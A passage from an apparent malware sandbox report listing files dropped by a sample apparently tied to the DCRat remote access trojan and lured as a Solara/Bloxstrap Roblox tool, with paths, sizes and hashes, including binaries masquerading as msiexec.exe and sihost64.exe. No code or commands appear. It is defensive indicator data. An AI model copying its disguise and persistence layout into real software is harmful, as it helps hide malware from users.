                                                                                                                                                                      SHA256

                                                                                                                                                                      4efb2f75283cd94d119ff111c7bd31656552de31c7424586716349fda97ba49a

                                                                                                                                                                      SHA512

                                                                                                                                                                      d172b18b206f179c193c7819b4bd6bee37537e1dd2004ee31ad800047254b33e385a261fdacc33545192f53da52e0fde407c34fe44d188f2f80df62bc2bf63dd

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      d1468279f8e95a0fa383753b4e80fa83

                                                                                                                                                                      SHA1

                                                                                                                                                                      5d1128d23068038e2a0a9237e0fa62cdce8c48b5

                                                                                                                                                                      SHA256

                                                                                                                                                                      2ff020de913ab372cf43cc4f196c08e13bb91621dddf411615f47a07ed932387

                                                                                                                                                                      SHA512

                                                                                                                                                                      81efb0c1c406dbed3c44ef832f329057c7469baf15203c34a38603b288263a31170dc280f84ead4a3960a8f091f86d031f332f8fcad4a2a428f5cb83aa833179

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      287adb4cac24c0d3b11e38e93b53d3b7

                                                                                                                                                                      SHA1

                                                                                                                                                                      074a89a622dd50b2869ba675b55b1879668e22f7

                                                                                                                                                                      SHA256

                                                                                                                                                                      d280d6bea3c07528690bf5d662bb9e6377ced1af840287bacfb73deb863fb5f5

                                                                                                                                                                      SHA512

                                                                                                                                                                      a205499a088519d051dbfe667cc925fb3f44cb015e17bd5ff21a0ce4e1b5f3f19d8015027b5fcd0ae5f7d679ce1f22eaa9cbce14c52bdf7ac540d4cf4185b402

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      987e362b8ad0b605c387875908dac877

                                                                                                                                                                      SHA1

                                                                                                                                                                      5821049970040dd3d566c43e5c88b29c76ae7130

                                                                                                                                                                      SHA256

                                                                                                                                                                      715298b879d93c6ecbc5fc24057c974771cd9ecee2009523232993f1be6c5761

                                                                                                                                                                      SHA512

                                                                                                                                                                      b00cf96f30682f7ec0d89c9a7b40f79acd9ccc28ae16b7340dd7a08364d4cbf4f10727f3effd97a6e70606704a3bc4b4a921a1550407002095d479c036bf742b

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      70d4615af57f63c836d39cceeaa909e2

                                                                                                                                                                      SHA1

                                                                                                                                                                      00c7e604657a36f08f0b03dd957747f5f8ed8b2f

                                                                                                                                                                      SHA256

                                                                                                                                                                      cb8ecead3ce35c570f643cd3f5fbb943b52cd42db069bf0b794a8a21669b3a13

                                                                                                                                                                      SHA512

                                                                                                                                                                      4d63b8341a604e74e7aa3f67ff61cd68c8ca0d7ce69db2f6efc49a09a7c3c3b70d3fb17946a3f2820b255f8a1ae43e1b14e6cc6d68b22ba522b6024fbef09ddb

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      944B

                                                                                                                                                                      MD5

                                                                                                                                                                      4914eb0b2ff51bfa48484b5cc8454218

                                                                                                                                                                      SHA1

                                                                                                                                                                      6a7c3e36ce53b42497884d4c4a3bda438dd4374b

                                                                                                                                                                      SHA256

                                                                                                                                                                      7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e

                                                                                                                                                                      SHA512

                                                                                                                                                                      83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      2.2MB

                                                                                                                                                                      MD5

                                                                                                                                                                      7529e4004c0fe742df146464e6aeadb0

                                                                                                                                                                      SHA1

                                                                                                                                                                      ae7341ee066b31de5a1a1a25851b70ced41de13f

                                                                                                                                                                      SHA256

                                                                                                                                                                      a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81

                                                                                                                                                                      SHA512

                                                                                                                                                                      d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.9MB

                                                                                                                                                                      MD5

                                                                                                                                                                      7d4b84a8c3d14cb3d1bb864719463404

                                                                                                                                                                      SHA1

                                                                                                                                                                      544cf51aec717c63552f0fdf97d364b1b62a7a0c

                                                                                                                                                                      SHA256

                                                                                                                                                                      3aa0597b5d053594cce551ac5d8a9bc83059c3d55ef024dc7dff59c73a88e663

                                                                                                                                                                      SHA512

                                                                                                                                                                      d962cbe9998d2e04a9bbd2ab1a97535409015b183acc0d61d49f6b696eac046e7c41028b55c8d33c3b6c1dacbf3704771dbdf911b06c8e9c247b49d2c6864a29

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Frage build.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      2.1MB

                                                                                                                                                                      MD5

                                                                                                                                                                      11fdce42422f8ed518fedf290f5bfc3c

                                                                                                                                                                      SHA1

                                                                                                                                                                      f18a4ad694af5ba50a7697b4cb66308454c555d9

                                                                                                                                                                      SHA256

                                                                                                                                                                      b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3

                                                                                                                                                                      SHA512

                                                                                                                                                                      4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\GI7AJm8Pkj.bat

                                                                                                                                                                      Filesize

                                                                                                                                                                      208B

                                                                                                                                                                      MD5

                                                                                                                                                                      21bbc2a8a750ef96d3caeba10fd86221

                                                                                                                                                                      SHA1

                                                                                                                                                                      08e9ac085cc53ca9265cb86df7736c0fc39b4f7d

                                                                                                                                                                      SHA256

                                                                                                                                                                      5effffab59a7c32c37c8a45ac1765c584b5edc9f7132b0d7f06e9449c01bfbd1

                                                                                                                                                                      SHA512

                                                                                                                                                                      77d3091d7e6609ae1138a08544a0bc378c2888d4e99de36c7b3f79c93d65a893584bac2dc6a626c6f133fd437dce0246d29560166bf91a7a67d5869524005282

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\HRhgErUjj3

                                                                                                                                                                      Filesize

                                                                                                                                                                      112KB

                                                                                                                                                                      MD5

                                                                                                                                                                      87210e9e528a4ddb09c6b671937c79c6

                                                                                                                                                                      SHA1

                                                                                                                                                                      3c75314714619f5b55e25769e0985d497f0062f2

                                                                                                                                                                      SHA256

                                                                                                                                                                      eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

                                                                                                                                                                      SHA512

                                                                                                                                                                      f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Result.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      2.6MB

                                                                                                                                                                      MD5

                                                                                                                                                                      170b43350048ed4b6fca0e50a0178621

                                                                                                                                                                      SHA1

                                                                                                                                                                      db863b7b04a7c58baa9120e2f184517ed27a7252

                                                                                                                                                                      SHA256

                                                                                                                                                                      248856f33f34ee7f97fd2a83264d4c85251f06bce6d5761d416405a33849079b

                                                                                                                                                                      SHA512

                                                                                                                                                                      e8dc07cf863d01e5ae18b44432cbf3ae54cd24f12d00981a5b5df51684039783339f7b43f79816d25790210654b3da17eae4687f2a3b34b6e2570c5ce990bde7

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      90KB

                                                                                                                                                                      MD5

                                                                                                                                                                      d84e7f79f4f0d7074802d2d6e6f3579e

                                                                                                                                                                      SHA1

                                                                                                                                                                      494937256229ef022ff05855c3d410ac3e7df721

                                                                                                                                                                      SHA256

                                                                                                                                                                      dcfc2b4fa3185df415855ec54395d9c36612f68100d046d8c69659da01f7d227

                                                                                                                                                                      SHA512

                                                                                                                                                                      ed7b0ac098c8184b611b83158eaa86619001e74dba079d398b34ac694ce404ba133c2baf43051840132d6a3a089a375550072543b9fab2549d57320d13502260

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat

                                                                                                                                                                      Filesize

                                                                                                                                                                      152B

                                                                                                                                                                      MD5

                                                                                                                                                                      d632b84fcdf100ad37607cc937e13114

                                                                                                                                                                      SHA1

                                                                                                                                                                      fae8757fa15bb944d37d34aa810ed506d01e159d

                                                                                                                                                                      SHA256

                                                                                                                                                                      118ca1c18be72ddfbc271f119547625e0c132c278d71d94a9e7771ca0e050707

                                                                                                                                                                      SHA512

                                                                                                                                                                      179bc79fae6e65de6e1321bfe0ad09602eeedb1fae797ab4efb8cad463417541fbbded3e9bb6ca7f27772ca9a1399b7e2cd0b0b0e3eacb8ea23675bc470f6646

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat

                                                                                                                                                                      Filesize

                                                                                                                                                                      152B

                                                                                                                                                                      MD5

                                                                                                                                                                      56c776813a97e69c94cc962139fc5d24

                                                                                                                                                                      SHA1

                                                                                                                                                                      115f200d4487119a713238819f673a6371793ceb

                                                                                                                                                                      SHA256

                                                                                                                                                                      ad7ffcd0faf4d7b2611514dc6a07b70597a4cdf6cd08875e5a8089409737153f

                                                                                                                                                                      SHA512

                                                                                                                                                                      a44c26474318d161dea40e0e297767281f0f59d70603d7d62a2564d84abf8dea5b47ae8fc7bae109459e858878cc3d6ae5dd0d2abde5e29aaf291121022b7a3d

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                                                      Filesize

                                                                                                                                                                      41B

                                                                                                                                                                      MD5

                                                                                                                                                                      5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                      SHA1

                                                                                                                                                                      d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                      SHA256

                                                                                                                                                                      f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                      SHA512

                                                                                                                                                                      de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

                                                                                                                                                                      Filesize

                                                                                                                                                                      8KB

                                                                                                                                                                      MD5

                                                                                                                                                                      82a297a411ecd02613504666c31e2297

                                                                                                                                                                      SHA1

                                                                                                                                                                      0b8c7bf92b10e159a99398e8b0e7fdc5bf9774b0

                                                                                                                                                                      SHA256

                                                                                                                                                                      e2331ac6f95111db222030597cfd64e46ffc9d0c000aea063fc648828c3d5bf2

                                                                                                                                                                      SHA512

                                                                                                                                                                      4aa3fc6e447955e77ea79daf849f6853d78d3ee053cdb97cd38d38590e09a963fd96c3ee2b0148492ea5e0c4521077dcdd3352658a4b594ac817d9a550d4136d

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State~RFe59aacd.TMP

                                                                                                                                                                      Filesize

                                                                                                                                                                      8KB

                                                                                                                                                                      MD5

                                                                                                                                                                      bf09cbbb06c206bb8a2c64429f6ea4d2

                                                                                                                                                                      SHA1

                                                                                                                                                                      3f3ef66fb39caf5971676bfe196ec0085ca4de4e

                                                                                                                                                                      SHA256

                                                                                                                                                                      97c3cb2b0489cfeb81711bbcde2fc99bc4cd42f5dc2b916e488f962ab76d3d2b

                                                                                                                                                                      SHA512

                                                                                                                                                                      3eeebedc0c592b725304411827d54ce26e37709a35c0bdd4c1d33fcd9426236ec94680704572e4632509d7b4a75e85a456835aa9c12d642c66a80cde300508d3

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      797KB

                                                                                                                                                                      MD5

                                                                                                                                                                      36b62ba7d1b5e149a2c297f11e0417ee

                                                                                                                                                                      SHA1

                                                                                                                                                                      ce1b828476274375e632542c4842a6b002955603

                                                                                                                                                                      SHA256

                                                                                                                                                                      8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c

                                                                                                                                                                      SHA512

                                                                                                                                                                      fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eqmru5ul.sh4.ps1

                                                                                                                                                                      Filesize

                                                                                                                                                                      60B

                                                                                                                                                                      MD5

                                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                      SHA1

                                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                      SHA256

                                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                      SHA512

                                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jLQbYOLWNc

                                                                                                                                                                      Filesize

                                                                                                                                                                      40KB

                                                                                                                                                                      MD5

                                                                                                                                                                      a182561a527f929489bf4b8f74f65cd7

                                                                                                                                                                      SHA1

                                                                                                                                                                      8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                                                                      SHA256

                                                                                                                                                                      42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                                                                      SHA512

                                                                                                                                                                      9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kLStaMuCA1

                                                                                                                                                                      Filesize

                                                                                                                                                                      114KB

                                                                                                                                                                      MD5

                                                                                                                                                                      8f56310b020fcf669bd142b81ed44eef

                                                                                                                                                                      SHA1

                                                                                                                                                                      791106ee08e585a0039a797c239b7b1e6650ef0d

                                                                                                                                                                      SHA256

                                                                                                                                                                      25d46841a59a4ca7581af94b5eaf7ce3960b84bc4db7a12c04ee61a0f13998a6

                                                                                                                                                                      SHA512

                                                                                                                                                                      9aa97802a933f4156994acfbb06715588b2e1bc3508b2b360c2fd856eb37ec032710e486cb271295f51d9ad1bd6c6133ec3e29ac280cd9cda93e63afc599ee97

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lzN4pU4zGp

                                                                                                                                                                      Filesize

                                                                                                                                                                      20KB

                                                                                                                                                                      MD5

                                                                                                                                                                      a603e09d617fea7517059b4924b1df93

                                                                                                                                                                      SHA1

                                                                                                                                                                      31d66e1496e0229c6a312f8be05da3f813b3fa9e

                                                                                                                                                                      SHA256

                                                                                                                                                                      ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

                                                                                                                                                                      SHA512

                                                                                                                                                                      eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

                                                                                                                                                                      Filesize

                                                                                                                                                                      30.1MB

                                                                                                                                                                      MD5

                                                                                                                                                                      0e4e9aa41d24221b29b19ba96c1a64d0

                                                                                                                                                                      SHA1

                                                                                                                                                                      231ade3d5a586c0eb4441c8dbfe9007dc26b2872

                                                                                                                                                                      SHA256

                                                                                                                                                                      5bfb6f3ab89e198539408f7e0e8ec0b0bd5efe8898573ec05b381228efb45a5d

                                                                                                                                                                      SHA512

                                                                                                                                                                      e6f27aecead72dffecbeaad46ebdf4b1fd3dbcddd1f6076ba183b654e4e32d30f7af1236bf2e04459186e993356fe2041840671be73612c8afed985c2c608913

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\solara.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.8MB

                                                                                                                                                                      MD5

                                                                                                                                                                      1797c0e37f4b9dd408cbf0d7bfcb7c95

                                                                                                                                                                      SHA1

                                                                                                                                                                      10df695351ac6074e23a3d3b4bd31a17c10fd614

                                                                                                                                                                      SHA256

                                                                                                                                                                      8a1b256aa65d666d8b566576c86065bb9401483f705bce0c597fc27b9cde2cfb

                                                                                                                                                                      SHA512

                                                                                                                                                                      52289cb15c7b2c5a600da9e9894f5dbc66566eff9c864488dfd8d318800fbbf8622a3dad79f7f5aec6d77badfc0707010ffffe521eef8f218be33e07092010b1

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      24.1MB

                                                                                                                                                                      MD5

                                                                                                                                                                      e091e9e5ede4161b45b880ccd6e140b0

                                                                                                                                                                      SHA1

                                                                                                                                                                      1a18b960482c2a242df0e891de9e3a125e439122

                                                                                                                                                                      SHA256

                                                                                                                                                                      cee28f29f904524b7f645bcec3dfdfe38f8269b001144cd909f5d9232890d33b

                                                                                                                                                                      SHA512

                                                                                                                                                                      fa8627055bbeb641f634b56059e7b5173e7c64faaa663e050c20d01d708a64877e71cd0b974282c70cb448e877313b1cf0519cf6128c733129b045f2b961a09b

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\zxhe5InkWx.bat

                                                                                                                                                                      Filesize

                                                                                                                                                                      219B

                                                                                                                                                                      MD5

                                                                                                                                                                      bbae12da368ff260626235282ba74889

                                                                                                                                                                      SHA1

                                                                                                                                                                      910b5f1d6bda77f9d851d6bc45a4dd3f0e5651c3

                                                                                                                                                                      SHA256

                                                                                                                                                                      ef19992016f206a6165d822c34b6a0f753004eb199b5384079c31e972ca7fc92

                                                                                                                                                                      SHA512

                                                                                                                                                                      f8eaf81a92158d2dfce50f470b60cc7707ddc67846c30bb7e58b7d1c507af6af11c842a9db8bd816105a9af9846c75327faaaaae99e6d7ac4e63da465930f3fe

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\msiexec.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.8MB

                                                                                                                                                                      MD5

                                                                                                                                                                      26e388ea32df635cd424decb2bff563e

                                                                                                                                                                      SHA1

                                                                                                                                                                      510ac8024dd524f7ebc92210b189804921fd29ee

                                                                                                                                                                      SHA256

                                                                                                                                                                      cf90b0e7318a9e4e3cbaeebd3f82f823e7754a35e689979fabd18e785383dc8e

                                                                                                                                                                      SHA512

                                                                                                                                                                      b59ecb856064e3d590ec3d0f17410195bf08cd6a2b0bb091c92c9200c3e163f5b0e918b09f7ff0f51990dae49ba27ea566862353647ee59ae9ea9c192faf79d1

                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      32KB

                                                                                                                                                                      MD5

                                                                                                                                                                      c1a4a4340b4aaf6b72487d4d011fdee9

                                                                                                                                                                      SHA1

                                                                                                                                                                      c1a25eeeb340d226fa996fd8b6e9559d3112b4c5

                                                                                                                                                                      SHA256

                                                                                                                                                                      858259d792411041f71a344c219b120bd494de51529259dac6846ae8e7e9bc19

                                                                                                                                                                      SHA512

                                                                                                                                                                      76316cb27ac8729ab8f972229c25e521213295c2a6b21b073cb9b258b056e85facd86754abbf1a7e89b7516a1a184b6826a078ddb56f4c9bb2de5c3844929f37

                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

                                                                                                                                                                      Filesize

                                                                                                                                                                      46B

                                                                                                                                                                      MD5

                                                                                                                                                                      83a7f739f51f1acd83f143afa6ec1533

                                                                                                                                                                      SHA1

                                                                                                                                                                      2f653f906842f8f507d02f81550eb26a35f38acc

                                                                                                                                                                      SHA256

                                                                                                                                                                      5faae2c746c71afcb3dc0b9eb4fbf6087786936484f62ee08412a94c13642545

                                                                                                                                                                      SHA512

                                                                                                                                                                      c4487c0ca0e630ee8daf2443c290fac2d0de60b0ce36c28e6451cfd66b2b81669a87726da31d4e172d2794a0345bbe9111402486b6e28d941fb6d124be604793

                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.5MB

                                                                                                                                                                      MD5

                                                                                                                                                                      9cf4017a8383ae846a908c79a28354bf

                                                                                                                                                                      SHA1

                                                                                                                                                                      adbe6a02b90147431e80fc38100de42d88dd765a

                                                                                                                                                                      SHA256

                                                                                                                                                                      bc7ea8011a8098690cf8976f14533fdbd5a0532818ed30365ef5412a256516f2

                                                                                                                                                                      SHA512

                                                                                                                                                                      490a19bdd35657a50e72f2c133c8d731cf1cccd14dc4ce9648d22f486540edd9f7448eb4d2840d52bd7601c52036572937b4c79bc32206eb98b7dc76765d1f00

                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

                                                                                                                                                                      Filesize

                                                                                                                                                                      221B

                                                                                                                                                                      MD5

                                                                                                                                                                      1a3448b944b91cebda73adc5064e6286

                                                                                                                                                                      SHA1

                                                                                                                                                                      4f8716c6e56a675944a5f0f250947c8d45a362e1

                                                                                                                                                                      SHA256

                                                                                                                                                                      5b489dab912970289bd0bfb41928010990288e7a3ec8acb18f637e670c50e0e5

                                                                                                                                                                      SHA512

                                                                                                                                                                      b355ffb98b0744cc6a1baaff7645c862344b12cfc251a1a243da666f7d41f8eea8b6a179faaeb600ffd4b4ce51b8c3f942c0cc6bd06875a4b80440468ce63795

                                                                                                                                                                    • C:\Windows\Installer\MSI2029.tmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      297KB

                                                                                                                                                                      MD5

                                                                                                                                                                      7a86ce1a899262dd3c1df656bff3fb2c

                                                                                                                                                                      SHA1

                                                                                                                                                                      33dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541

                                                                                                                                                                      SHA256

                                                                                                                                                                      b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c

                                                                                                                                                                      SHA512

                                                                                                                                                                      421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec

                                                                                                                                                                    • C:\Windows\Installer\MSI7AC.tmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      122KB

                                                                                                                                                                      MD5

                                                                                                                                                                      9fe9b0ecaea0324ad99036a91db03ebb

                                                                                                                                                                      SHA1

                                                                                                                                                                      144068c64ec06fc08eadfcca0a014a44b95bb908

                                                                                                                                                                      SHA256

                                                                                                                                                                      e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9

                                                                                                                                                                      SHA512

                                                                                                                                                                      906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176

                                                                                                                                                                    • C:\Windows\Installer\MSI8E6.tmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      211KB

                                                                                                                                                                      MD5

                                                                                                                                                                      a3ae5d86ecf38db9427359ea37a5f646

                                                                                                                                                                      SHA1

                                                                                                                                                                      eb4cb5ff520717038adadcc5e1ef8f7c24b27a90

                                                                                                                                                                      SHA256

                                                                                                                                                                      c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74

                                                                                                                                                                      SHA512

                                                                                                                                                                      96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

                                                                                                                                                                    • C:\Windows\Temp\{E38E2BBF-0F68-48E2-84EC-A6A871276858}\.ba\logo.png

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      d6bd210f227442b3362493d046cea233

                                                                                                                                                                      SHA1

                                                                                                                                                                      ff286ac8370fc655aea0ef35e9cf0bfcb6d698de

                                                                                                                                                                      SHA256

                                                                                                                                                                      335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef

                                                                                                                                                                      SHA512

                                                                                                                                                                      464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b

                                                                                                                                                                    • C:\winNet\ComContainerbrowserRefRuntime.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.6MB

                                                                                                                                                                      MD5

                                                                                                                                                                      e41ef428aaa4841f258a38dc1cc305ef

                                                                                                                                                                      SHA1

                                                                                                                                                                      edf3a17831e013b74479e2e635b8cf0c1b3787ce

                                                                                                                                                                      SHA256

                                                                                                                                                                      6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995

                                                                                                                                                                      SHA512

                                                                                                                                                                      a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

                                                                                                                                                                    • C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat

                                                                                                                                                                      Filesize

                                                                                                                                                                      92B

                                                                                                                                                                      MD5

                                                                                                                                                                      81c6a00913630266cef3d07065db9b1f

                                                                                                                                                                      SHA1

                                                                                                                                                                      db6260ef38563ec05f910277af358fbaa2387154

                                                                                                                                                                      SHA256

                                                                                                                                                                      5898912e30972853e1b8ee628e9c300f25c5959d11e6b91b6454ddc19e328cf4

                                                                                                                                                                      SHA512

                                                                                                                                                                      a643512ca118e8745ae8aafb010bb21099ba0a358eb8a951471cc5092e14c51ffafae0c288d84ddcda5eaad2a3e93b30ecd205bfe0938a21f05e6c87ead3cb36

                                                                                                                                                                    • C:\winNet\we9fgyC144zVOkGk.vbe

                                                                                                                                                                      Filesize

                                                                                                                                                                      215B

                                                                                                                                                                      MD5

                                                                                                                                                                      aa1a085aba94a5fc38c26b79a2217336

                                                                                                                                                                      SHA1

                                                                                                                                                                      f847af2aec7fd56fe8734ccb51d8027b9b4e817b

                                                                                                                                                                      SHA256

                                                                                                                                                                      f66e935da9738cbddac905b9b55a2cfe5003aab76863b180a28e42238cbaa545

                                                                                                                                                                      SHA512

                                                                                                                                                                      75f66a848dc09ea859d7ddad59f6d7cac148936340eef14c4ad6cec7d4d92cf0c32bdaf911c0d943e7c478445118852180bdaceb72d9d4aae919f99cd6538981

                                                                                                                                                                    • memory/1476-750-0x000000001D650000-0x000000001DB78000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      5.2MB

                                                                                                                                                                    • memory/1476-562-0x000000001CA50000-0x000000001CC12000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.8MB

                                                                                                                                                                    • memory/1672-3992-0x000002573DA50000-0x000002573DB26000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      856KB

                                                                                                                                                                    • memory/1972-3271-0x0000021B91400000-0x0000021B91406000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      24KB

                                                                                                                                                                    • memory/1972-3273-0x0000021B92F80000-0x0000021B92F86000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      24KB

                                                                                                                                                                    • memory/2188-104-0x000000001BE10000-0x000000001BE1E000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      56KB

                                                                                                                                                                    • memory/2188-87-0x00000000017B0000-0x00000000017BE000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      56KB

                                                                                                                                                                    • memory/2188-107-0x000000001C690000-0x000000001C69C000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      48KB

                                                                                                                                                                    • memory/2188-106-0x000000001C680000-0x000000001C68A000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      40KB

                                                                                                                                                                    • memory/2188-99-0x00000000030C0000-0x00000000030DC000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      112KB

                                                                                                                                                                    • memory/2188-100-0x000000001C6C0000-0x000000001C710000-memory.dmp
